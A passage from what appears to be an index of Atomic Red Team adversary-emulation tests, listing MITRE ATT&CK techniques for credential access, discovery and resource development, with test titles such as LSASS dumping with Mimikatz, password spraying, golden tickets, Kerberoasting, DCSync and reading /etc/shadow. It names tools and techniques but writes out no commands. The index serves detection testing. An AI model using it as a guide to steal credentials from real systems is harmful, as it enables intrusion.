  - Atomic Test #4: Dump LSASS.exe Memory using NanoDump [windows]
  - Atomic Test #5: Dump LSASS.exe Memory using Windows Task Manager [windows]
  - Atomic Test #6: Offline Credential Theft With Mimikatz [windows]
  - Atomic Test #7: LSASS read with pypykatz [windows]
  - Atomic Test #8: Dump LSASS.exe Memory using Out-Minidump.ps1 [windows]
  - Atomic Test #9: Create Mini Dump of LSASS.exe using ProcDump [windows]
  - Atomic Test #10: Powershell Mimikatz [windows]
  - Atomic Test #11: Dump LSASS with createdump.exe from .Net v5 [windows]
  - Atomic Test #12: Dump LSASS.exe using imported Microsoft DLLs [windows]
- T1179 Hooking [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.003 Brute Force: Password Spraying](../../T1110.003/T1110.003.md)
  - Atomic Test #1: Password Spray all Domain Users [windows]
  - Atomic Test #2: Password Spray (DomainPasswordSpray) [windows]
  - Atomic Test #3: Password spray all Active Directory domain users with a single password via LDAP against domain controller (NTLM or Kerberos) [windows]
  - Atomic Test #4: Password spray all Azure AD users with a single password [azure-ad]
  - Atomic Test #5: WinPwn - DomainPasswordSpray Attacks [windows]
  - Atomic Test #6: Password Spray Invoke-DomainPasswordSpray Light [windows]
  - Atomic Test #7: Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365) [azure-ad]
  - Atomic Test #8: Password Spray using Kerbrute Tool [windows]
  - Atomic Test #9: AWS - Password Spray an AWS using GoAWSConsoleSpray [iaas:aws]
- T1056.003 Web Portal Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.005 OS Credential Dumping: Cached Domain Credentials](../../T1003.005/T1003.005.md)
  - Atomic Test #1: Cached Credential Dump via Cmdkey [windows]
- [T1558.001 Steal or Forge Kerberos Tickets: Golden Ticket](../../T1558.001/T1558.001.md)
  - Atomic Test #1: Crafting Active Directory golden tickets with mimikatz [windows]
  - Atomic Test #2: Crafting Active Directory golden tickets with Rubeus [windows]
- [T1649 Steal or Forge Authentication Certificates](../../T1649/T1649.md)
  - Atomic Test #1: Staging Local Certificates via Export-Certificate [windows]
- [T1552.003 Unsecured Credentials: Bash History](../../T1552.003/T1552.003.md)
  - Atomic Test #1: Search Through Bash History [linux, macos]
- [T1552.001 Unsecured Credentials: Credentials In Files](../../T1552.001/T1552.001.md)
  - Atomic Test #1: Find AWS credentials [macos, linux]
  - Atomic Test #2: Extract Browser and System credentials with LaZagne [macos]
  - Atomic Test #3: Extract passwords with grep [macos, linux]
  - Atomic Test #4: Extracting passwords with findstr [windows]
  - Atomic Test #5: Access unattend.xml [windows]
  - Atomic Test #6: Find and Access Github Credentials [macos, linux]
  - Atomic Test #7: WinPwn - sensitivefiles [windows]
  - Atomic Test #8: WinPwn - Snaffler [windows]
  - Atomic Test #9: WinPwn - powershellsensitive [windows]
  - Atomic Test #10: WinPwn - passhunt [windows]
  - Atomic Test #11: WinPwn - SessionGopher [windows]
  - Atomic Test #12: WinPwn - Loot local Credentials - AWS, Microsoft Azure, and Google Compute credentials [windows]
- T1606.001 Web Cookies [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1528 Steal Application Access Token](../../T1528/T1528.md)
  - Atomic Test #1: Azure - Dump All Azure Key Vaults with Microburst [iaas:azure]
- [T1552.006 Unsecured Credentials: Group Policy Preferences](../../T1552.006/T1552.006.md)
  - Atomic Test #1: GPP Passwords (findstr) [windows]
  - Atomic Test #2: GPP Passwords (Get-GPPPassword) [windows]
- T1556.008 Network Provider DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1141 Input Prompt [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1606 Forge Web Credentials [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1621 Multi-Factor Authentication Request Generation [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1552.008 Chat Messages [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1212 Exploitation for Credential Access [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1142 Keychain [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.002 Input Capture: GUI Input Capture](../../T1056.002/T1056.002.md)
  - Atomic Test #1: AppleScript - Prompt User for Password [macos]
  - Atomic Test #2: PowerShell - Prompt User for Password [windows]
- T1110 Brute Force [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1110.004 Brute Force: Credential Stuffing](../../T1110.004/T1110.004.md)
  - Atomic Test #1: SSH Credential Stuffing From Linux [linux]
  - Atomic Test #2: SSH Credential Stuffing From MacOS [macos]
  - Atomic Test #3: Brute Force:Credential Stuffing using Kerbrute Tool [windows]
- T1208 Kerberoasting [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.006 Multi-Factor Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1187 Forced Authentication](../../T1187/T1187.md)
  - Atomic Test #1: PetitPotam [windows]
  - Atomic Test #2: WinPwn - PowerSharpPack - Retrieving NTLM Hashes without Touching LSASS [windows]
- T1174 Password Filter DLL [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1081 Credentials in Files [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1056 Input Capture [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1557.002 ARP Cache Poisoning [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.008 OS Credential Dumping: /etc/passwd and /etc/shadow](../../T1003.008/T1003.008.md)
  - Atomic Test #1: Access /etc/shadow (Local) [linux]
  - Atomic Test #2: Access /etc/passwd (Local) [linux]
  - Atomic Test #3: Access /etc/{shadow,passwd} with a standard bin that's not cat [linux]
  - Atomic Test #4: Access /etc/{shadow,passwd} with shell builtins [linux]
- [T1558.002 Steal or Forge Kerberos Tickets: Silver Ticket](../../T1558.002/T1558.002.md)
  - Atomic Test #1: Crafting Active Directory silver tickets with mimikatz [windows]
- [T1555.004 Credentials from Password Stores: Windows Credential Manager](../../T1555.004/T1555.004.md)
  - Atomic Test #1: Access Saved Credentials via VaultCmd [windows]
  - Atomic Test #2: WinPwn - Loot local Credentials - Invoke-WCMDump [windows]
- T1556.001 Domain Controller Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1556.005 Reversible Encryption [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1111 Multi-Factor Authentication Interception [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1003.003 OS Credential Dumping: NTDS](../../T1003.003/T1003.003.md)
  - Atomic Test #1: Create Volume Shadow Copy with vssadmin [windows]
  - Atomic Test #2: Copy NTDS.dit from Volume Shadow Copy [windows]
  - Atomic Test #3: Dump Active Directory Database with NTDSUtil [windows]
  - Atomic Test #4: Create Volume Shadow Copy with WMI [windows]
  - Atomic Test #5: Create Volume Shadow Copy remotely with WMI [windows]
  - Atomic Test #6: Create Volume Shadow Copy remotely (WMI) with esentutl [windows]
  - Atomic Test #7: Create Volume Shadow Copy with Powershell [windows]
  - Atomic Test #8: Create Symlink to Volume Shadow Copy [windows]
- [T1558.003 Steal or Forge Kerberos Tickets: Kerberoasting](../../T1558.003/T1558.003.md)
  - Atomic Test #1: Request for service tickets [windows]
  - Atomic Test #2: Rubeus kerberoast [windows]
  - Atomic Test #3: Extract all accounts in use as SPN using setspn [windows]
  - Atomic Test #4: Request A Single Ticket via PowerShell [windows]
  - Atomic Test #5: Request All Tickets via PowerShell [windows]
  - Atomic Test #6: WinPwn - Kerberoasting [windows]
  - Atomic Test #7: WinPwn - PowerSharpPack - Kerberoasting Using Rubeus [windows]
- [T1003.006 OS Credential Dumping: DCSync](../../T1003.006/T1003.006.md)
  - Atomic Test #1: DCSync (Active Directory) [windows]
  - Atomic Test #2: Run DSInternals Get-ADReplAccount [windows]
- T1556 Modify Authentication Process [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1056.004 Input Capture: Credential API Hooking](../../T1056.004/T1056.004.md)
  - Atomic Test #1: Hook PowerShell TLS Encrypt/Decrypt Messages [windows]
- [T1552.007 Kubernetes List Secrets](../../T1552.007/T1552.007.md)
  - Atomic Test #1: List All Secrets [containers]
  - Atomic Test #2: ListSecrets [containers]
  - Atomic Test #3: Cat the contents of a Kubernetes service account token file [linux]
- T1556.004 Network Device Authentication [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
# discovery
- [T1033 System Owner/User Discovery](../../T1033/T1033.md)
  - Atomic Test #1: System Owner/User Discovery [windows]
  - Atomic Test #2: System Owner/User Discovery [linux, macos]
  - Atomic Test #3: Find computers where user has session - Stealth mode (PowerView) [windows]
  - Atomic Test #4: User Discovery With Env Vars PowerShell Script [windows]
  - Atomic Test #5: GetCurrent User with PowerShell Script [windows]
  - Atomic Test #6: System Discovery - SocGholish whoami [windows]
- [T1613 Container and Resource Discovery](../../T1613/T1613.md)
  - Atomic Test #1: Container and ResourceDiscovery [containers]
- T1016.001 Internet Connection Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069 Permission Groups Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1069.003 Cloud Groups [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1615 Group Policy Discovery](../../T1615/T1615.md)
  - Atomic Test #1: Display group policy information via gpresult [windows]
  - Atomic Test #2: Get-DomainGPO to display group policy information via PowerView [windows]
  - Atomic Test #3: WinPwn - GPOAudit [windows]
  - Atomic Test #4: WinPwn - GPORemoteAccessPolicy [windows]
  - Atomic Test #5: MSFT Get-GPO Cmdlet [windows]
- T1652 Device Driver Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.002 Account Discovery: Domain Account](../../T1087.002/T1087.002.md)
  - Atomic Test #1: Enumerate all accounts (Domain) [windows]
  - Atomic Test #2: Enumerate all accounts via PowerShell (Domain) [windows]
  - Atomic Test #3: Enumerate logged on users via CMD (Domain) [windows]
  - Atomic Test #4: Automated AD Recon (ADRecon) [windows]
  - Atomic Test #5: Adfind -Listing password policy [windows]
  - Atomic Test #6: Adfind - Enumerate Active Directory Admins [windows]
  - Atomic Test #7: Adfind - Enumerate Active Directory User Objects [windows]
  - Atomic Test #8: Adfind - Enumerate Active Directory Exchange AD Objects [windows]
  - Atomic Test #9: Enumerate Default Domain Admin Details (Domain) [windows]
  - Atomic Test #10: Enumerate Active Directory for Unconstrained Delegation [windows]
  - Atomic Test #11: Get-DomainUser with PowerView [windows]
  - Atomic Test #12: Enumerate Active Directory Users with ADSISearcher [windows]
  - Atomic Test #13: Enumerate Linked Policies In ADSISearcher Discovery [windows]
  - Atomic Test #14: Enumerate Root Domain linked policies Discovery [windows]
  - Atomic Test #15: WinPwn - generaldomaininfo [windows]
  - Atomic Test #16: Kerbrute - userenum [windows]
  - Atomic Test #17: Wevtutil - Discover NTLM Users Remote [windows]
  - Atomic Test #18: Suspicious LAPS Attributes Query with Get-ADComputer all properties [windows]
  - Atomic Test #19: Suspicious LAPS Attributes Query with Get-ADComputer ms-Mcs-AdmPwd property [windows]
  - Atomic Test #20: Suspicious LAPS Attributes Query with Get-ADComputer all properties and SearchScope [windows]
  - Atomic Test #21: Suspicious LAPS Attributes Query with adfind all properties [windows]
  - Atomic Test #22: Suspicious LAPS Attributes Query with adfind ms-Mcs-AdmPwd [windows]
- T1063 Security Software Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1087.001 Account Discovery: Local Account](../../T1087.001/T1087.001.md)
  - Atomic Test #1: Enumerate all accounts (Local) [linux]
  - Atomic Test #2: View sudoers access [linux, macos]
  - Atomic Test #3: View accounts with UID 0 [linux, macos]
  - Atomic Test #4: List opened files by user [linux, macos]
  - Atomic Test #5: Show if a user account has ever logged in remotely [linux]
  - Atomic Test #6: Enumerate users and groups [linux, macos]
  - Atomic Test #7: Enumerate users and groups [macos]
  - Atomic Test #8: Enumerate all accounts on Windows (Local) [windows]
  - Atomic Test #9: Enumerate all accounts via PowerShell (Local) [windows]
  - Atomic Test #10: Enumerate logged on users via CMD (Local) [windows]
- [T1497.001 Virtualization/Sandbox Evasion: System Checks](../../T1497.001/T1497.001.md)
  - Atomic Test #1: Detect Virtualization Environment (Linux) [linux]
  - Atomic Test #2: Detect Virtualization Environment (Windows) [windows]
  - Atomic Test #3: Detect Virtualization Environment (MacOS) [macos]
  - Atomic Test #4: Detect Virtualization Environment via WMI Manufacturer/Model Listing (Windows) [windows]
- [T1069.002 Permission Groups Discovery: Domain Groups](../../T1069.002/T1069.002.md)
  - Atomic Test #1: Basic Permission Groups Discovery Windows (Domain) [windows]
  - Atomic Test #2: Permission Groups Discovery PowerShell (Domain) [windows]
  - Atomic Test #3: Elevated group enumeration using net group (Domain) [windows]
  - Atomic Test #4: Find machines where user has local admin access (PowerView) [windows]
  - Atomic Test #5: Find local admins on all machines in domain (PowerView) [windows]
  - Atomic Test #6: Find Local Admins via Group Policy (PowerView) [windows]
  - Atomic Test #7: Enumerate Users Not Requiring Pre Auth (ASRepRoast) [windows]
  - Atomic Test #8: Adfind - Query Active Directory Groups [windows]
  - Atomic Test #9: Enumerate Active Directory Groups with Get-AdGroup [windows]
  - Atomic Test #10: Enumerate Active Directory Groups with ADSISearcher [windows]
  - Atomic Test #11: Get-ADUser Enumeration using UserAccountControl flags (AS-REP Roasting) [windows]
  - Atomic Test #12: Get-DomainGroupMember with PowerView [windows]
  - Atomic Test #13: Get-DomainGroup with PowerView [windows]
  - Atomic Test #14: Active Directory Enumeration with LDIFDE [windows]
- [T1007 System Service Discovery](../../T1007/T1007.md)
  - Atomic Test #1: System Service Discovery [windows]
  - Atomic Test #2: System Service Discovery - net.exe [windows]
  - Atomic Test #3: System Service Discovery - systemctl [linux]
- [T1040 Network Sniffing](../../T1040/T1040.md)
  - Atomic Test #1: Packet Capture Linux using tshark or tcpdump [linux]
  - Atomic Test #2: Packet Capture macOS using tcpdump or tshark [macos]
  - Atomic Test #3: Packet Capture Windows Command Prompt [windows]
  - Atomic Test #4: Windows Internal Packet Capture [windows]
  - Atomic Test #5: Windows Internal pktmon capture [windows]
  - Atomic Test #6: Windows Internal pktmon set filter [windows]
  - Atomic Test #7: Packet Capture macOS using /dev/bpfN with sudo [macos]
  - Atomic Test #8: Filtered Packet Capture macOS using /dev/bpfN with sudo [macos]
  - Atomic Test #9: Packet Capture Linux socket AF_PACKET,SOCK_RAW with sudo [linux]
  - Atomic Test #10: Packet Capture Linux socket AF_INET,SOCK_RAW,TCP with sudo [linux]
  - Atomic Test #11: Packet Capture Linux socket AF_INET,SOCK_PACKET,UDP with sudo [linux]
  - Atomic Test #12: Packet Capture Linux socket AF_PACKET,SOCK_RAW with BPF filter for UDP with sudo [linux]
- [T1135 Network Share Discovery](../../T1135/T1135.md)
  - Atomic Test #1: Network Share Discovery [macos]
  - Atomic Test #2: Network Share Discovery - linux [linux]
  - Atomic Test #3: Network Share Discovery command prompt [windows]
  - Atomic Test #4: Network Share Discovery PowerShell [windows]
  - Atomic Test #5: View available share drives [windows]
  - Atomic Test #6: Share Discovery with PowerView [windows]
  - Atomic Test #7: PowerView ShareFinder [windows]
  - Atomic Test #8: WinPwn - shareenumeration [windows]
  - Atomic Test #9: Network Share Discovery via dir command [windows]
- [T1120 Peripheral Device Discovery](../../T1120/T1120.md)
  - Atomic Test #1: Win32_PnPEntity Hardware Inventory [windows]
  - Atomic Test #2: WinPwn - printercheck [windows]
- [T1082 System Information Discovery](../../T1082/T1082.md)
  - Atomic Test #1: System Information Discovery [windows]
  - Atomic Test #2: System Information Discovery [macos]
  - Atomic Test #3: List OS Information [linux, macos]
  - Atomic Test #4: Linux VM Check via Hardware [linux]
  - Atomic Test #5: Linux VM Check via Kernel Modules [linux]
  - Atomic Test #6: Hostname Discovery (Windows) [windows]
  - Atomic Test #7: Hostname Discovery [linux, macos]
  - Atomic Test #8: Windows MachineGUID Discovery [windows]
  - Atomic Test #9: Griffon Recon [windows]
  - Atomic Test #10: Environment variables discovery on windows [windows]
  - Atomic Test #11: Environment variables discovery on macos and linux [macos, linux]
  - Atomic Test #12: Show System Integrity Protection status (MacOS) [macos]
  - Atomic Test #13: WinPwn - winPEAS [windows]
  - Atomic Test #14: WinPwn - itm4nprivesc [windows]
  - Atomic Test #15: WinPwn - Powersploits privesc checks [windows]
  - Atomic Test #16: WinPwn - General privesc checks [windows]
  - Atomic Test #17: WinPwn - GeneralRecon [windows]
  - Atomic Test #18: WinPwn - Morerecon [windows]
  - Atomic Test #19: WinPwn - RBCD-Check [windows]
  - Atomic Test #20: WinPwn - PowerSharpPack - Watson searching for missing windows patches [windows]
  - Atomic Test #21: WinPwn - PowerSharpPack - Sharpup checking common Privesc vectors [windows]
  - Atomic Test #22: WinPwn - PowerSharpPack - Seatbelt [windows]
  - Atomic Test #23: Azure Security Scan with SkyArk [azure-ad]
  - Atomic Test #24: Linux List Kernel Modules [linux]
  - Atomic Test #25: System Information Discovery with WMIC [windows]
- [T1010 Application Window Discovery](../../T1010/T1010.md)
  - Atomic Test #1: List Process Main Windows - C# .NET [windows]
- T1087.003 Email Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1497.003 Time Based Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1580 Cloud Infrastructure Discovery](../../T1580/T1580.md)
  - Atomic Test #1: AWS - EC2 Enumeration from Cloud Instance [linux, macos]
- [T1217 Browser Bookmark Discovery](../../T1217/T1217.md)
  - Atomic Test #1: List Mozilla Firefox Bookmark Database Files on Linux [linux]
  - Atomic Test #2: List Mozilla Firefox Bookmark Database Files on macOS [macos]
  - Atomic Test #3: List Google Chrome Bookmark JSON Files on macOS [macos]
  - Atomic Test #4: List Google Chrome / Opera Bookmarks on Windows with powershell [windows]
  - Atomic Test #5: List Google Chrome / Edge Chromium Bookmarks on Windows with command prompt [windows]
  - Atomic Test #6: List Mozilla Firefox bookmarks on Windows with command prompt [windows]
  - Atomic Test #7: List Internet Explorer Bookmarks using the command prompt [windows]
  - Atomic Test #8: List Safari Bookmarks on MacOS [macos]
- [T1016 System Network Configuration Discovery](../../T1016/T1016.md)
  - Atomic Test #1: System Network Configuration Discovery on Windows [windows]
  - Atomic Test #2: List Windows Firewall Rules [windows]
  - Atomic Test #3: System Network Configuration Discovery [macos, linux]
  - Atomic Test #4: System Network Configuration Discovery (TrickBot Style) [windows]
  - Atomic Test #5: List Open Egress Ports [windows]
  - Atomic Test #6: Adfind - Enumerate Active Directory Subnet Objects [windows]
  - Atomic Test #7: Qakbot Recon [windows]
  - Atomic Test #8: List macOS Firewall Rules [macos]
  - Atomic Test #9: DNS Server Discovery Using nslookup [windows]
- T1087 Account Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1482 Domain Trust Discovery](../../T1482/T1482.md)
  - Atomic Test #1: Windows - Discover domain trusts with dsquery [windows]
  - Atomic Test #2: Windows - Discover domain trusts with nltest [windows]
  - Atomic Test #3: Powershell enumerate domains and forests [windows]
  - Atomic Test #4: Adfind - Enumerate Active Directory OUs [windows]
  - Atomic Test #5: Adfind - Enumerate Active Directory Trusts [windows]
  - Atomic Test #6: Get-DomainTrust with PowerView [windows]
  - Atomic Test #7: Get-ForestTrust with PowerView [windows]
  - Atomic Test #8: TruffleSnout - Listing AD Infrastructure [windows]
- [T1083 File and Directory Discovery](../../T1083/T1083.md)
  - Atomic Test #1: File and Directory Discovery (cmd.exe) [windows]
  - Atomic Test #2: File and Directory Discovery (PowerShell) [windows]
  - Atomic Test #3: Nix File and Directory Discovery [macos, linux]
  - Atomic Test #4: Nix File and Directory Discovery 2 [macos, linux]
  - Atomic Test #5: Simulating MAZE Directory Enumeration [windows]
  - Atomic Test #6: Launch DirLister Executable [windows]
- [T1049 System Network Connections Discovery](../../T1049/T1049.md)
  - Atomic Test #1: System Network Connections Discovery [windows]
  - Atomic Test #2: System Network Connections Discovery with PowerShell [windows]
  - Atomic Test #3: System Network Connections Discovery Linux & MacOS [linux, macos]
  - Atomic Test #4: System Discovery using SharpView [windows]
- T1497 Virtualization/Sandbox Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1619 Cloud Storage Object Discovery](../../T1619/T1619.md)
  - Atomic Test #1: AWS S3 Enumeration [iaas:azure]
- T1087.004 Cloud Account [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1057 Process Discovery](../../T1057/T1057.md)
  - Atomic Test #1: Process Discovery - ps [macos, linux]
  - Atomic Test #2: Process Discovery - tasklist [windows]
  - Atomic Test #3: Process Discovery - Get-Process [windows]
  - Atomic Test #4: Process Discovery - get-wmiObject [windows]
  - Atomic Test #5: Process Discovery - wmic process [windows]
  - Atomic Test #6: Discover Specific Process - tasklist [windows]
- T1497.002 User Activity Based Checks [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1069.001 Permission Groups Discovery: Local Groups](../../T1069.001/T1069.001.md)
  - Atomic Test #1: Permission Groups Discovery (Local) [macos, linux]
  - Atomic Test #2: Basic Permission Groups Discovery Windows (Local) [windows]
  - Atomic Test #3: Permission Groups Discovery PowerShell (Local) [windows]
  - Atomic Test #4: SharpHound3 - LocalAdmin [windows]
  - Atomic Test #5: Wmic Group Discovery [windows]
  - Atomic Test #6: WMIObject Group Discovery [windows]
  - Atomic Test #7: Permission Groups Discovery for Containers- Local Groups [containers]
- [T1201 Password Policy Discovery](../../T1201/T1201.md)
  - Atomic Test #1: Examine password complexity policy - Ubuntu [linux]
  - Atomic Test #2: Examine password complexity policy - CentOS/RHEL 7.x [linux]
  - Atomic Test #3: Examine password complexity policy - CentOS/RHEL 6.x [linux]
  - Atomic Test #4: Examine password expiration policy - All Linux [linux]
  - Atomic Test #5: Examine local password policy - Windows [windows]
  - Atomic Test #6: Examine domain password policy - Windows [windows]
  - Atomic Test #7: Examine password policy - macOS [macos]
  - Atomic Test #8: Get-DomainPolicy with PowerView [windows]
  - Atomic Test #9: Enumerate Active Directory Password Policy with get-addefaultdomainpasswordpolicy [windows]
  - Atomic Test #10: Use of SecEdit.exe to export the local security policy (including the password policy) [windows]
  - Atomic Test #11: Examine AWS Password Policy [iaas:aws]
- [T1614.001 System Location Discovery: System Language Discovery](../../T1614.001/T1614.001.md)
  - Atomic Test #1: Discover System Language by Registry Query [windows]
  - Atomic Test #2: Discover System Language with chcp [windows]
  - Atomic Test #3: Discover System Language with locale [linux]
  - Atomic Test #4: Discover System Language with localectl [linux]
  - Atomic Test #5: Discover System Language by locale file [linux]
  - Atomic Test #6: Discover System Language by Environment Variable Query [linux]
- [T1012 Query Registry](../../T1012/T1012.md)
  - Atomic Test #1: Query Registry [windows]
  - Atomic Test #2: Query Registry with Powershell cmdlets [windows]
  - Atomic Test #3: Enumerate COM Objects in Registry with Powershell [windows]
- T1614 System Location Discovery [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1518.001 Software Discovery: Security Software Discovery](../../T1518.001/T1518.001.md)
  - Atomic Test #1: Security Software Discovery [windows]
  - Atomic Test #2: Security Software Discovery - powershell [windows]
  - Atomic Test #3: Security Software Discovery - ps (macOS) [macos]
  - Atomic Test #4: Security Software Discovery - ps (Linux) [linux]
  - Atomic Test #5: Security Software Discovery - Sysmon Service [windows]
  - Atomic Test #6: Security Software Discovery - AV Discovery via WMI [windows]
- [T1526 Cloud Service Discovery](../../T1526/T1526.md)
  - Atomic Test #1: Azure - Dump Subscription Data with MicroBurst [iaas:azure]
- [T1018 Remote System Discovery](../../T1018/T1018.md)
  - Atomic Test #1: Remote System Discovery - net [windows]
  - Atomic Test #2: Remote System Discovery - net group Domain Computers [windows]
  - Atomic Test #3: Remote System Discovery - nltest [windows]
  - Atomic Test #4: Remote System Discovery - ping sweep [windows]
  - Atomic Test #5: Remote System Discovery - arp [windows]
  - Atomic Test #6: Remote System Discovery - arp nix [linux, macos]
  - Atomic Test #7: Remote System Discovery - sweep [linux, macos]
  - Atomic Test #8: Remote System Discovery - nslookup [windows]
  - Atomic Test #9: Remote System Discovery - adidnsdump [windows]
  - Atomic Test #10: Adfind - Enumerate Active Directory Computer Objects [windows]
  - Atomic Test #11: Adfind - Enumerate Active Directory Domain Controller Objects [windows]
  - Atomic Test #12: Remote System Discovery - ip neighbour [linux]
  - Atomic Test #13: Remote System Discovery - ip route [linux]
  - Atomic Test #14: Remote System Discovery - ip tcp_metrics [linux]
  - Atomic Test #15: Enumerate domain computers within Active Directory using DirectorySearcher [windows]
  - Atomic Test #16: Enumerate Active Directory Computers with Get-AdComputer [windows]
  - Atomic Test #17: Enumerate Active Directory Computers with ADSISearcher [windows]
  - Atomic Test #18: Get-DomainController with PowerView [windows]
  - Atomic Test #19: Get-WmiObject to Enumerate Domain Controllers [windows]
  - Atomic Test #20: Remote System Discovery - net group Domain Controller [windows]
- [T1046 Network Service Discovery](../../T1046/T1046.md)
  - Atomic Test #1: Port Scan [linux, macos]
  - Atomic Test #2: Port Scan Nmap [linux, macos]
  - Atomic Test #3: Port Scan NMap for Windows [windows]
  - Atomic Test #4: Port Scan using python [windows]
  - Atomic Test #5: WinPwn - spoolvulnscan [windows]
  - Atomic Test #6: WinPwn - MS17-10 [windows]
  - Atomic Test #7: WinPwn - bluekeep [windows]
  - Atomic Test #8: WinPwn - fruit [windows]
  - Atomic Test #9: Network Service Discovery for Containers [containers]
- [T1518 Software Discovery](../../T1518/T1518.md)
  - Atomic Test #1: Find and Display Internet Explorer Browser Version [windows]
  - Atomic Test #2: Applications Installed [windows]
  - Atomic Test #3: Find and Display Safari Browser Version [macos]
  - Atomic Test #4: WinPwn - Dotnetsearch [windows]
  - Atomic Test #5: WinPwn - DotNet [windows]
  - Atomic Test #6: WinPwn - powerSQL [windows]
- T1538 Cloud Service Dashboard [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1622 Debugger Evasion [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- [T1124 System Time Discovery](../../T1124/T1124.md)
  - Atomic Test #1: System Time Discovery [windows]
  - Atomic Test #2: System Time Discovery - PowerShell [windows]
  - Atomic Test #3: System Time Discovery in macOS [macos]
  - Atomic Test #4: System Time Discovery W32tm as a Delay [windows]
  - Atomic Test #5: System Time with Windows time Command [windows]
# resource-development
- T1583 Acquire Infrastructure [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.007 Serverless [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.008 Malvertising [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.004 Digital Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.002 DNS Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.003 Digital Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.001 Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586.001 Social Media Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1588.006 Vulnerabilities [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.005 Botnet [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.004 Drive-by Target [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1587.002 Code Signing Certificates [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1584.003 Virtual Private Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586.003 Cloud Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1586.002 Email Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.001 Upload Malware [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.001 Domains [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1608.002 Upload Tool [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1583.004 Server [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
- T1585.002 Email Accounts [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)
